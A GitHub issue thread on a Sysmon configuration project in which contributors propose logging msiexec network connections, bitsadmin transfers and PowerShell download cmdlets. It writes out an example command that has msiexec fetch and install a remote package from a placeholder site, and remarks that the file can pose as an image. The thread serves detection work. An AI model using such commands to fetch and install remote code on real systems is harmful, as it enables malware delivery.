### ISSUE TITLE
NetworkConnect Recommendation

### ISSUE THREAD

**Issue by vector-sec** [SwiftOnSecurity/sysmon-config#11]
I would make a PR, but I'm keeping a lot more changes than just one in my fork, plus the change is concise enough that it'll fit in an issue easily.

I would recommend adding msiexec.exe to NetworkConnect logging. The reason being you can run 

`msiexec.exe /i http://site.com/pathtoamsi.msi`

And msiexec will download the file and install it.

It is also worth noting that the URL does not need to end in .msi, it could just as easily be .jpg and it would work just the same as long as the file is actually an msi file.

**Comment by ion-storm** [comment]
I'd also log execution of bitsadmin /transfer, bitsadmin can be used to wget files

**Comment by ion-storm** [comment]
Also would recommend adding filtering for invoke-webrequest, iex, iwr from powershell.

**Comment by vector-sec** [comment]
Cmdlets of PowerShell like iwr are covered by the PowerShell.exe image inclusion in the config, but I did not know about bitsadmin.
